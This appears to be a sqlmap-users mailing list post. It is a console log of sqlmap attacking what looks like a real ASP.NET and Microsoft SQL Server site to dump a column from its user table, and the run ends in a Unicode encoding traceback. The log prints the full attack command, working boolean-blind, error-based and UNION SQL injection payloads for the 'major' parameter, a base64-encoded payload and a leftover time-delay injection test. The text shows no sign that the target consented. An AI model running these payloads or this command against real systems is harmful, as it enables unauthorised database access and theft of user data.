root@anonymous:~/sqlmap-0905# ./sqlmap.py -r file2 -p 'major' --dbms=mssql
--level=5 --risk=3 --tamper=base64encode -D vls3db4 -T dbo.dd_users -C
'最后登录时间' --dump --hex -v 3
sqlmap/1.0-dev-4cf49bc - automatic SQL injection and database takeover
tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program
[*] starting at 00:51:25
[00:51:25] [INFO] parsing HTTP request from 'file2'
[00:51:25] [DEBUG] not a valid WebScarab log data
[00:51:25] [DEBUG] cleaning up configuration parameters
[00:51:25] [INFO] loading tamper script 'base64encode'
[00:51:25] [DEBUG] setting the HTTP timeout
[00:51:25] [DEBUG] setting the HTTP method to GET
[00:51:25] [DEBUG] creating HTTP requests opener object
[00:51:25] [DEBUG] forcing back-end DBMS to user defined value
[00:51:25] [WARNING] it appears that you have provided tainted parameter
values ('major=')waitfor delay'0:0:20'--') with most probably leftover
chars/statements from manual SQL injection test(s). Please, always use only
valid parameter values so sqlmap could be able to run properly
Are you sure you want to continue? [y/N] y
[00:51:26] [INFO] testing connection to the target URL
[00:51:49] [DEBUG] declared web page charset 'gb2312'
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: major
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: classid=&specialid=2&qstr=&major=-1315') OR (1954=1954) AND
('IRZo'='IRZo&station=&idxpage=2&ptopid=
Vector: OR ([INFERENCE])
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING
clause
Payload: classid=&specialid=2&qstr=&major=-3052') OR
5359=CONVERT(INT,(SELECT
CHAR(113)+CHAR(122)+CHAR(118)+CHAR(121)+CHAR(113)+(SELECT (CASE WHEN
(5359=5359) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(101)+CHAR(99)+CHAR(99)+CHAR(113))) AND
('PLJO'='PLJO&station=&idxpage=2&ptopid=
Vector: OR [RANDNUM]=CONVERT(INT,(SELECT
'[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
Type: UNION query
Title: Generic UNION query (random number) - 16 columns
Payload: classid=&specialid=2&qstr=&major=-7814') UNION ALL SELECT
CHAR(113)+CHAR(122)+CHAR(118)+CHAR(121)+CHAR(113)+CHAR(106)+CHAR(86)+CHAR(99)+CHAR(114)+CHAR(70)+CHAR(111)+CHAR(78)+CHAR(116)+CHAR(69)+CHAR(87)+CHAR(113)+CHAR(101)+CHAR(99)+CHAR(99)+CHAR(113),1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654--
&station=&idxpage=2&ptopid=
Vector: UNION ALL SELECT
[QUERY],9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026--
---
[00:51:49] [WARNING] changes made by tampering scripts are not included in
shown payload content(s)
[00:51:49] [INFO] testing Microsoft SQL Server
[00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:49] [INFO] confirming Microsoft SQL Server
[00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:49] [PAYLOAD]
LTQ3MjInKSBVTklPTiBBTEwgU0VMRUNUIENIQVIoMTEzKStDSEFSKDEyMikrQ0hBUigxMTgpK0NIQVIoMTIxKStDSEFSKDExMykrKENBU0UgV0hFTiAoQ09OQ0FUKE5VTEwsTlVMTCk9Q09OQ0FUKE5VTEwsTlVMTCkpIFRIRU4gQ0hBUig0OSkgRUxTRSBDSEFSKDQ4KSBFTkQpK0NIQVIoMTEzKStDSEFSKDEwMSkrQ0hBUig5OSkrQ0hBUig5OSkrQ0hBUigxMTMpLDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LS0g
[00:51:50] [DEBUG] performed 1 queries in 0.57 seconds
[00:51:50] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[00:51:50] [INFO] fetching columns '最后登录时间' for table 'dd_users' in
database 'vls3db4'
[00:51:50] [INFO] the SQL query used returns 1 entries
[00:51:50] [DEBUG] performed 0 queries in 0.02 seconds
[00:51:50] [INFO] fetching entries of column(s) '[最后登录时间]' for table
'dd_users' in database 'vls3db4'
[00:51:50] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:50] [INFO] fetching number of distinct values for column '[最后登录时间]'
Traceback (most recent call last):
File "/root/sqlmap-0905/thirdparty/ansistrm/ansistrm.py", line 51, in emit
message = stdoutencode(self.format(record))
File "/root/sqlmap-0905/lib/core/convert.py", line 160, in stdoutencode
retVal = data.encode(UNICODE_ENCODING)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe6 in position 688:
ordinal not in range(128)
Logged from file sqlmap.py, line 125
Traceback (most recent call last):
File "./sqlmap.py", line 95, in main
start()
File "/root/sqlmap-0905/lib/controller/controller.py", line 582, in start
action()
File "/root/sqlmap-0905/lib/controller/action.py", line 127, in action
conf.dbmsHandler.dumpTable()
File "/root/sqlmap-0905/plugins/generic/entries.py", line 155, in
dumpTable
retVal = pivotDumpTable(table, colList, blind=False)
File "/root/sqlmap-0905/lib/utils/pivotdumptable.py", line 86, in
pivotDumpTable
value = inject.getValue(query, blind=blind, union=not blind, error=not
blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
File "/root/sqlmap-0905/lib/request/inject.py", line 360, in getValue
value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else
query, unpack, dump)
File "/root/sqlmap-0905/lib/request/inject.py", line 312, in _goUnion
output = unionUse(expression, unpack=unpack, dump=dump)
File "/root/sqlmap-0905/lib/techniques/union/use.py", line 334, in
unionUse
output = _oneShotUnionUse(expression, unpack)
File "/root/sqlmap-0905/lib/techniques/union/use.py", line 73, in
_oneShotUnionUse
page, headers = Request.queryPage(payload, content=True, raise404=False)
File "/root/sqlmap-0905/lib/request/connect.py", line 641, in queryPage
payload = function(payload=payload, headers=auxHeaders)
File "/root/sqlmap-0905/tamper/base64encode.py", line 25, in tamper
return base64.b64encode(payload) if payload else payload
File "/usr/lib/python2.7/base64.py", line 53, in b64encode
encoded = binascii.b2a_base64(s)[:-1]
UnicodeEncodeError: 'ascii' codec can't encode characters in position
147-152: ordinal not in range(128)
[*] shutting down at 00:51:50
------------------------------------------------------------------------------
LIMITED TIME SALE - Full Year of Microsoft Training For Just $49.99!
1,500+ hours of tutorials including VisualStudio 2012, Windows 8, SharePoint
2013, SQL 2012, MVC 4, more. BEST VALUE: New Multi-Library Power Pack includes
Mobile, Cloud, Java, and UX Design. Lowest price ever! Ends 9/22/13.
http://pubads.g.doubleclick.net/gampad/clk?id=64545871&iu=/4140/ostg.clktrk
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
